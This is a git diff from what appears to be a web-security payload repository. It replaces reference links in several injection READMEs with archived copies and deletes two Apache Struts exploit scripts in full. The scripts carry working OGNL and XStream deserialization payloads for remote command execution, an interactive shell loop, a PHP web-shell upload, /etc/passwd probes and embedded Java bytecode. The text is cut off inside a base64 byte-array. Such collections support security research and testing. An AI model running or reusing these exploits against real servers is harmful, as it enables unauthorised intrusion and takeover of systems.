+* [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://web.archive.org/web/20260302141111/https://portswigger.net/web-security/cors)
+* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://web.archive.org/web/20250512191501/https://hackerone.com/reports/235200)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://web.archive.org/web/20190919034024/https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://web.archive.org/web/20260204152901/https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://web.archive.org/web/20210126182728/https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md
index d4b4ec2..f6fce56 100644
--- a/CRLF Injection/README.md	
+++ b/CRLF Injection/README.md	
@@ -147,6 +147,6 @@ URL encoded version
 
 ## References
 
-* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection)
+* [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://web.archive.org/web/20200113055606/https://www.owasp.org/index.php/CRLF_Injection)
 * [CRLF injection on Twitter or why blacklists fail - XSS Jigsaw - April 21, 2015](https://web.archive.org/web/20150425024348/https://blog.innerht.ml/twitter-crlf-injection/)
 * [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - December 20, 2016](https://vulners.com/hackerone/H1:192749)
diff --git a/CSS Injection/README.md b/CSS Injection/README.md
index 30b5f0d..898b58f 100644
--- a/CSS Injection/README.md	
+++ b/CSS Injection/README.md	
@@ -185,15 +185,15 @@ Payload example using `fontleak` with a custom selector, parent element, and alp
 
 ## References
 
-* [0CTF 2023 Writeups - Web - newdiary - aszx87410 - December 11, 2023](https://blog.huli.tw/2023/12/11/en/0ctf-2023-writeup/)
-* [Bench Press: Leaking Text Nodes with CSS - pspaul - October 20, 2024](https://blog.pspaul.de/posts/bench-press-leaking-text-nodes-with-css/)
-* [Better Exfiltration via HTML Injection - d0nut - April 11, 2019](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
-* [Blind CSS Exfiltration: exfiltrate unknown web pages - Gareth Heyes - December 5, 2023](https://portswigger.net/research/blind-css-exfiltration)
-* [CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)
-* [CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025](https://blog.voorivex.team/css-data-exfiltration-to-steal-oauth-token)
-* [CSS Injection - xsleaks.dev - May 9, 2025](https://xsleaks.dev/docs/attacks/css-injection/)
-* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - 2019](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
-* [CSS Injection: Attacking with Just CSS (Part 2) - aszx87410 - September 24, 2023](https://aszx87410.github.io/beyond-xss/en/ch3/css-injection-2/)
-* [Fontleak: exfiltrating text using CSS and Ligatures - Dragos Albastroiu - April 16, 2025](https://adragos.ro/fontleak/)
-* [How you can steal private data through CSS injection - invicti - April 23, 2018](https://www.invicti.com/blog/web-security/private-data-stolen-exploiting-css-injection)
-* [Inline Style Exfiltration: leaking data with chained CSS conditionals - Gareth Heyes - August 26, 2025](https://portswigger.net/research/inline-style-exfiltration)
+* [0CTF 2023 Writeups - Web - newdiary - aszx87410 - December 11, 2023](https://web.archive.org/web/20260208112931/https://blog.huli.tw/2023/12/11/en/0ctf-2023-writeup/)
+* [Bench Press: Leaking Text Nodes with CSS - pspaul - October 20, 2024](https://web.archive.org/web/20250809122224/https://blog.pspaul.de/posts/bench-press-leaking-text-nodes-with-css/)
+* [Better Exfiltration via HTML Injection - d0nut - April 11, 2019](https://web.archive.org/web/20260206153955/https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
+* [Blind CSS Exfiltration: exfiltrate unknown web pages - Gareth Heyes - December 5, 2023](https://web.archive.org/web/20231205201432/https://portswigger.net/research/blind-css-exfiltration)
+* [CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015](https://web.archive.org/web/20260212042745/https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)
+* [CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025](https://web.archive.org/web/20250601232405/https://blog.voorivex.team/css-data-exfiltration-to-steal-oauth-token)
+* [CSS Injection - xsleaks.dev - May 9, 2025](https://web.archive.org/web/20260114161847/https://xsleaks.dev/docs/attacks/css-injection/)
+* [CSS Injection Attacks or how to leak content with <style> - Pepe Vila - 2019](https://web.archive.org/web/20250928084357/https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf)
+* [CSS Injection: Attacking with Just CSS (Part 2) - aszx87410 - September 24, 2023](https://web.archive.org/web/20231223213409/https://aszx87410.github.io/beyond-xss/en/ch3/css-injection-2/)
+* [Fontleak: exfiltrating text using CSS and Ligatures - Dragos Albastroiu - April 16, 2025](https://web.archive.org/web/20251130021102/https://adragos.ro/fontleak/)
+* [How you can steal private data through CSS injection - invicti - April 23, 2018](https://web.archive.org/web/20251107094938/https://www.invicti.com/blog/web-security/private-data-stolen-exploiting-css-injection)
+* [Inline Style Exfiltration: leaking data with chained CSS conditionals - Gareth Heyes - August 26, 2025](https://web.archive.org/web/20260226022330/https://portswigger.net/research/inline-style-exfiltration)
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index 047cb2d..f4607f3 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -83,10 +83,10 @@ Note: an alert will warn the user a formula is trying to contact an external res
 
 ## References
 
-* [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection)
-* [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
-* [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://payatu.com/csv-injection-basic-to-exploit/)
-* [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/)
-* [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html)
-* [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
-* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
+* [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://web.archive.org/web/20260211194330/https://owasp.org/www-community/attacks/CSV_Injection)
+* [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://web.archive.org/web/20251126193606/https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
+* [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://web.archive.org/web/20221205154959/https://payatu.com/csv-injection-basic-to-exploit/)
+* [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://web.archive.org/web/20251020005639/https://blog.xpnsec.com/from-csv-to-meterpreter/)
+* [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](https://web.archive.org/web/20260216175809/https://georgemauer.net/2017/10/07/csv-injection.html)
+* [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://web.archive.org/web/20220928031043/https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
+* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://web.archive.org/web/20260115180627/https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
diff --git a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
deleted file mode 100644
index eeded2a..0000000
--- a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py	
+++ /dev/null
@@ -1,215 +0,0 @@
-#!/usr/bin/python
-
-from __future__ import print_function
-from future import standard_library
-standard_library.install_aliases()
-from builtins import input
-from builtins import str
-import urllib.request, urllib.error, urllib.parse
-import time
-import sys
-import os
-import subprocess
-import requests
-import readline
-import urllib.parse
-
-RED = '\033[1;31m'
-BLUE = '\033[94m'
-BOLD = '\033[1m'
-GREEN = '\033[32m'
-OTRO = '\033[36m'
-YELLOW = '\033[33m'
-ENDC = '\033[0m'
-
-def cls():
-    os.system(['clear', 'cls'][os.name == 'nt'])
-cls()
-
-logo = BLUE+'''
-  ___   _____  ___    _   _  _____  ___
- (  _`\(_   _)|  _`\ ( ) ( )(_   _)(  _`\
- | (_(_) | |  | (_) )| | | |  | |  | (_(_)
- `\__ \  | |  | ,  / | | | |  | |  `\__ \
- ( )_) | | |  | |\ \ | (_) |  | |  ( )_) |
- `\____) (_)  (_) (_)(_____)  (_)  `\____)
-
-        =[ Command Execution v3]=
-              By @s1kr10s
-'''+ENDC
-print(logo)
-
-print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
-host = input(BOLD+" [+] HOST: "+ENDC)
-
-if len(host) > 0:
-    if host.find("https://") != -1 or host.find("http://") != -1:
-
-        poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
-
-        def exploit(comando):
-            exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
-            return exploit
-
-        def exploit2(comando):
-            exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
-            return exploit2
-
-        def exploit3(comando):
-            exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
-            return exploit3
-
-        def pwnd(shellfile):
-            exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
-            return exploitfile
-
-        def validador():
-            arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
-            return arr_lin_win
-
-        #def reversepl(ip,port):
-        #       print "perl"
-
-        #def reversepy(ip,port):
-        #       print "python"
-
-        # CVE-2013-2251 ---------------------------------------------------------------------------------
-        try:
-            response = ''
-            response = urllib.request.urlopen(host+poc)
-        except:
-            print(RED+" Servidor no responde\n"+ENDC)
-            exit(0)
-
-        print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
-
-        if response.read().find("mamalo") != -1:
-            print(RED+"   [-] VULNERABLE"+ENDC)
-            owned = open('vulnsite.txt', 'a')
-            owned.write(str(host)+'\n')
-            owned.close()
-
-            opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-            #print BOLD+"   * [SHELL REVERSA]"+ENDC
-            #print OTRO+"     Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
-            if opcion == 's':
-                print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-                time.sleep(1)
-                print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
-                print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
-
-                while 1:
-                    separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
-                    espacio = separador.split(' ')
-                    comando = "','".join(espacio)
-
-                    if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
-                        shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
-                        print("\n"+shell.read())
-                    elif espacio[0] == 'pwnd':
-                        pathsave=input("path EJ:/tmp/: ")
-
-                        if espacio[1] == 'php':
-                            shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
-                            urllib.request.urlopen(host+pwnd(str(shellfile)))
-                            shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
-                            if shell.read().find(pathsave+"status.php") != -1:
-                                print(BOLD+GREEN+"\nCreate File Successful :) ["+pathsave+"status.php]\n"+ENDC)
-                            else:
-                                print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
-
-        # CVE-2017-5638 ---------------------------------------------------------------------------------
-        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
-        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
-        x = 0
-        while x < len(validador()):
-            valida = validador()[x]
-
-            try:
-                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
-                result = urllib.request.urlopen(req).read()
-
-                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
-                    print(RED+"   [-] VULNERABLE"+ENDC)
-                    owned = open('vulnsite.txt', 'a')
-                    owned.write(str(host)+'\n')
-                    owned.close()
-
-                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-                    if opcion == 's':
-                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-                        time.sleep(1)
-
-                        while 1:
-                            try:
-                                separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
-                                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
-                                result = urllib.request.urlopen(req).read()
-                                print("\n"+result)
-                            except:
-                                exit(0)
-                    else:
-                        x = len(validador())
-                else:
-                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
-            except:
-                pass
-            x=x+1
-
-        # CVE-2018-11776 ---------------------------------------------------------------------------------
-        print(BLUE+"     [-] NO VULNERABLE"+ENDC)
-        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
-        x = 0
-        while x < len(validador()):
-            #Filtramos la url solo dominio
-            url = host.replace('#', '%23')
-            url = host.replace(' ', '%20')
-            if ('://' not in url):
-                url = str("http://") + str(url)
-            scheme = urllib.parse.urlparse(url).scheme
-            site = scheme + '://' + urllib.parse.urlparse(url).netloc
-
-            #Filtramos la url solo path
-            file_path = urllib.parse.urlparse(url).path
-            if (file_path == ''):
-                file_path = '/'
-
-            valida = validador()[x]
-            try:
-                result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
-
-                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
-                    print(RED+"   [-] VULNERABLE"+ENDC)
-                    owned = open('vulnsite.txt', 'a')
-                    owned.write(str(host)+'\n')
-                    owned.close()
-
-                    opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-                    if opcion == 's':
-                        print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-                        time.sleep(1)
-                        print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
-                        print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
-
-                        while 1:
-                            separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
-                            espacio = separador.split(' ')
-                            comando = "%20".join(espacio)
-
-                            shell = urllib.request.urlopen(host+exploit3(str(comando)))
-                            print("\n"+shell.read())
-
-                    else:
-                        x = len(validador())
-                        exit(0)
-                else:
-                    print(BLUE+"     [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
-            except:
-                pass
-            x=x+1
-    else:
-        print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
-        exit(0)
-else:
-    print(RED+" Debe Ingresar una Url\n"+ENDC)
-    exit(0)
diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py
deleted file mode 100644
index 4eb64f5..0000000
--- a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py	
+++ /dev/null
@@ -1,326 +0,0 @@
-#!/usr/bin/env python3
-# coding=utf-8
-# *****************************************************
-# struts-pwn: Apache Struts CVE-2017-9805 Exploit
-# Author:
-# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
-# This code is based on:
-# https://github.com/rapid7/metasploit-framework/pull/8924
-# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
-# *****************************************************
-from __future__ import print_function
-from builtins import str
-import argparse
-import requests
-import sys
-
-# Disable SSL warnings
-try:
-    import requests.packages.urllib3
-    requests.packages.urllib3.disable_warnings()
-except Exception:
-    pass
-
-if len(sys.argv) <= 1:
-    print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
-    print('[*] Struts-PWN - @mazen160')
-    print('\n%s -h for help.' % (sys.argv[0]))
-    exit(0)
-
-parser = argparse.ArgumentParser()
-parser.add_argument("-u", "--url",
-                    dest="url",
-                    help="Check a single URL.",
-                    action='store')
-parser.add_argument("-l", "--list",
-                    dest="usedlist",
-                    help="Check a list of URLs.",
-                    action='store')
-parser.add_argument("-c", "--cmd",
-                    dest="cmd",
-                    help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
-                    action='store',
-                    default='echo test > /tmp/struts-pwn')
-parser.add_argument("--exploit",
-                    dest="do_exploit",
-                    help="Exploit.",
-                    action='store_true')
-args = parser.parse_args()
-url = args.url if args.url else None
-usedlist = args.usedlist if args.usedlist else None
-url = args.url if args.url else None
-cmd = args.cmd if args.cmd else None
-do_exploit = args.do_exploit if args.do_exploit else None
-
-
-def url_prepare(url):
-    url = url.replace('#', '%23')
-    url = url.replace(' ', '%20')
-    if ('://' not in url):
-        url = str('http') + str('://') + str(url)
-    return(url)
-
-
-def exploit(url, cmd, dont_print_status_on_console=False):
-    url = url_prepare(url)
-    if dont_print_status_on_console is False:
-        print('\n[*] URL: %s' % (url))
-        print('[*] CMD: %s' % (cmd))
-    cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
-
-    payload = """
-<map>
-  <entry>
-    <jdk.nashorn.internal.objects.NativeString>
-      <flags>0</flags>
-      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
-        <dataHandler>
-          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
-            <is class="javax.crypto.CipherInputStream">
-              <cipher class="javax.crypto.NullCipher">
-                <initialized>false</initialized>
-                <opmode>0</opmode>
-                <serviceIterator class="javax.imageio.spi.FilterIterator">
-                  <iter class="javax.imageio.spi.FilterIterator">
-                    <iter class="java.util.Collections$EmptyIterator"/>
-                    <next class="java.lang.ProcessBuilder">
-                      <command>
-                        {0}
-                      </command>
-                      <redirectErrorStream>false</redirectErrorStream>
-                    </next>
-                  </iter>
-                  <filter class="javax.imageio.ImageIO$ContainsFilter">
-                    <method>
-                      <class>java.lang.ProcessBuilder</class>
-                      <name>start</name>
-                      <parameter-types/>
-                    </method>
-                    <name>foo</name>
-                  </filter>
-                  <next class="string">foo</next>
-                </serviceIterator>
-                <lock/>
-              </cipher>
-              <input class="java.lang.ProcessBuilder$NullInputStream"/>
-              <ibuffer/>
-              <done>false</done>
-              <ostart>0</ostart>
-              <ofinish>0</ofinish>
-              <closed>false</closed>
-            </is>
-            <consumed>false</consumed>
-          </dataSource>
-          <transferFlavors/>
-        </dataHandler>
-        <dataLen>0</dataLen>
-      </value>
-    </jdk.nashorn.internal.objects.NativeString>
-    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
-  </entry>
-  <entry>
-    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
-    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
-  </entry>
-</map>
-""".format(cmd)
-
-    headers = {
-        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
-        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
-        'Referer': str(url),
-        'Content-Type': 'application/xml',
-        'Accept': '*/*'
-    }
-
-    timeout = 3
-    try:
-        output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
-    except Exception as e:
-        print("EXCEPTION::::--> " + str(e))
-        output = 'ERROR'
-    return(output)
-
-
-def check(url):
-    url = url_prepare(url)
-    print('\n[*] URL: %s' % (url))
-
-    initial_request = exploit(url, "", dont_print_status_on_console=True)
-    if initial_request == "ERROR":
-        result = False
-        print("The host does not respond as expected.")
-        return(result)
-
-    payload_sleep_based_10seconds = """
-<map>
-  <entry>
-    <jdk.nashorn.internal.objects.NativeString>
-      <flags>0</flags>
-      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
-        <dataHandler>
-          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
-            <is class="javax.crypto.CipherInputStream">
-              <cipher class="javax.crypto.NullCipher">
-                <initialized>false</initialized>
-                <opmode>0</opmode>
-                <serviceIterator class="javax.imageio.spi.FilterIterator">
-                  <iter class="javax.imageio.spi.FilterIterator">
-                    <iter class="java.util.Collections$EmptyIterator"/>
-                    <next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
-                      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
-                        <default>
-                          <__name>Pwnr</__name>
-                          <__bytecodes>
-                            <byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
-dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
-EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
-bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
-bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
-c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
-aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
-YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
-eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
-cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
-L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
-L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
-KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
-eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
-L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
-amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
-ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
-bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
-YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
-L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
-BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
-MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
-AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
-AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
-AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
-AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
-AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
-AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
-</byte-array>
-                            <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
-dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
-EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
-aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
-YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
-bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
-bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
